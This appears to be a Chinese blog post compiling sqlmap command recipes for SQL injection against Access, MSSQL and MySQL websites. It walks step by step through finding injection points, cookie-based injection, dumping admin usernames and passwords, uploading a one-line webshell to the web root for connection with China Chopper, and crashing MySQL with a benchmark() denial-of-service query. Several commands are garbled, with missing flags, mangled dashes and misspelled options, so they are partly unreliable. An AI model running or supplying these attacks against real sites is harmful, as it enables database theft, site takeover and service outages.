Sqlmap渗透注入 整合(1)

Access数据库注入

  1. 1.判断注入的是否存在注入漏洞
  2. sqlmap -"http://www.xxx.com/xx.asp?id=xxx"
  3. root@tiejiang:~# sqlmap -u(-u:指定一个URL) "http://www.xxx.com/xx.asp?id=xxx"
  4.  
  5. 2.获取表名
  6. sqlmap -http//www.xxx.com/xx.asp?id=xxx” --tables
  7. root@tiejiang:~# sqlmap -"http://www.xxx.com/xx.asp?id=xxx" --tables
  8.  
  9. 3.获取字段名
  10. sqlmap -http://www.xxx.com/xx.asp?id=xxx” --columns -T 表名
  11. root@tiejiang:~# sqlmap -"http://www.xxx.com/xx.asp?id=xxx" --columns -T admin
  12.  
  13. 4.获取字段中的内容
  14. sqlmap -http://www.xxx.com/xx.asp?id=xxx” --dump -T 表名 -C "字段名1,字段名2..."
  15. root@tiejiang:~# sqlmap -"http://www.xxx.com/xx.asp?id=xxx" --dump -T admin -"username,password"

Cookie中转注入

  1. 注:此方法使用于access数据库,mysqlMSSQL数据库请在第二步获取站点当前数据库及数据库,方法与常规mysqlMSSQL注入一样,只不过在后面加上了“--level 2”这个参数,其他参数照常使用。
  2.  
  3. 1.判断数据库,获取服务器,网站环境等参数
  4. sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --table --level 2
  5. 例:sqlmap.py -"http://www.xx.com/show.asp" --cookie "id=187" --talbe --level 2
  6.  
  7. 2.获取字段
  8. sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --columns -T 数据表 --level 2
  9. 例:sqlmap.py -"http://www.xx.com/show.asp" --cookie "id=187" --columns -T admin --level 2
  10.  
  11. 3.获取字段中的内容
  12. sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --dump -T 表名 -C "字段名1,字段名2" --level 2
  13. 例:sqlmap.py -"http://www.xx.com/show.asp" --cookie "id=187" --dump admin -"username,password" --level 2

File参数使用

  1. 权限:必须为dba权限
  2. filewrite        从本地写入
  3. filedest        写入目标路径
  4. 判断是否是dba权限(显示TRUE或者FALSETRUE即为dba权限,反之不是)
  5. sqlmap.py “http://www.xx.com/aa.aspx?id=123” isdba
  6. 写入文件至站点目录
  7. sqlmap.py “http://www.xx.com/aa.aspx?id=123” filewrite=本地文件路径 filedest 网站路径(写入路径)+“/写入的文件名”
  8. sqlmap.py “http://www.xx.com/aa.aspx?id=123” filewrite=F:/kx.aspx –file-dest D:/虚拟目录/Front/kx.aspx
  9. D:/虚拟目录/Front 为网站的物理路径
  10. 写入成功后,即可通过浏览器访问,若为一句话木马则可使用中国菜刀进行连接。
  11. 注:网站路径必须为网站的真实物理路径(即绝对路径。也就是从盘符开始的路径),否则无法写入数据。

MSSQL数据库注入

  1. 1.判断注入点,获取网站信息
  2. sqlmap.py -u http://www.xx.com/ss.asp?id=123
  3. 例:sqlmap.py -"http://www.xx.com/ss.asp?id=123"
  4.  
  5. 2.获取所有数据库
  6. sqlmap.py -u http://www.xx.com/ss.asp?id=123 --dbs
  7. 例:sqlmap.py -"http://www.xx.com/ss.asp?id=123" --dbs
  8.  
  9. 3.获取网站当前所使用的数据库
  10. sqlmap.py -u http://www.xx.com/ss.asp?id=123 --current-db
  11. 例:sqlmap.py -"http://www.xx.com/ss.asp?id=123" --current-db
  12.  
  13. 4.获取数据库中的表名
  14. sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 --tables
  15. 例:sqlmap.py -"http://www.xx.com/ss.asp?id=123" -D news2008 --tables
  16.  
  17. 5.获取数据表中的字段名
  18. sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 --columns
  19. 例:sqlmap.py -"http://www.xx.com/ss.asp?id=123" -D news2008 -T admin --columns
  20.  
  21. 6.获取字段中的内容
  22. sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 -C "字段名1,字段名2..." --dump
  23. 例:sqlmap.py -"http://www.xx.com/ss.asp?id=123" -D news2008 -T admin -"username,psw" --dump

Mysql Dos攻击

  1. 作用:攻击其数据库,使其停止工作,迫使管理员手动重启数据库。
  2.  
  3. 注意:在进行DOS攻击的时候你需要拥有足够大的权限或者拥有一个shell
  4.  
  5. 1.获得shell:–sqlshell
  6. 示例:sqlmap.py u http://www.xx.com/news.php?id=1 –sql-shell
  7.  
  8. 2.shell处执行语句就可以完成一个DOS攻击,可是使其数据库爆破或停止运行。
  9. sqlshell>select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
  10. 攻击语句:select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

MySQL数据库注入

  1. sqlmap.py -u http://www.xx.com/show.php?id=81 --当前用户权限
  2. 例:sqlmap.py -"http://www.xx.com/show.php?id=81" --is-dba
  3.  
  4. sqlmap.py -u http://www.xx.com/show.php?id=81 --所有数据库用户
  5. 例:sqlmap.py -"http://www.xx.com/show.php?id=81" --users
  6.  
  7. sqlmap.py -u http://www.xx.com/show.php?id=81 --当前数据库用户
  8. 例:sqlmap.py -"http://www.xx.com/show.php?id=81" --current-user
  9.  
  10. 1.检测注入点,判断数据库类型及服务器等类型
  11. sqlmap.py -u http://www.xx.com/show.php?id=81
  12. 例:sqlmap.py -"http://www.xx.com/show.php?id=81"
  13.  
  14. 2.获取所有数据库
  15. sqlmap.py -u http://www.xx.com/show.php?id=81 --获取所有数据库
  16. 例:sqlmap.py -"http://www.xx.com/show.php?id=81" --dbs
  17.  
  18. 3.获取网站当前数据库
  19. sqlmap.py -u http://www.xx.com/show.php?id=81 --获取网站当前数据库
  20. 例:sqlmap.py -"http://www.xx.com/show.php?id=81" --current-db
  21.  
  22. 4.获取数据库中的表
  23. sqlmap.py -u http://www.xx.com/show.php?id=81 -D 指定一个数据库 --tables
  24. 例:sqlmap.py -"http://www.xx.com/show.php?id=81" -D zsb --tables
  25.  
  26. 5.获取数据表中的字段
  27. sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 --columns
  28. 例:sqlmap.py -"http://www.xx.com/show.php?id=81" -D zsb -T user --columns
  29.  
  30. 6.获取字段中的内容
  31. sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 -C 字段名1,字段名2,字段名3... --dump
  32. 例:sqlmap.py -"http://www.xx.com/show.php?id=81" -D zsb -T user -"u_id,u_name,u_pass" --dump
暂无评论

发送评论 编辑评论


				
上一篇
下一篇